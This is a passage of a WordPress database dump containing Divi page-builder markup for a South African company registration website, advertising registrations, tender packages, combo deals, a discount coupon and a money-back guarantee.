animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color=\"#000000\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.24\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:36:03','2019-08-08 08:36:03','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32386,3,'2019-08-08 10:32:57','2019-08-08 08:32:57','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" 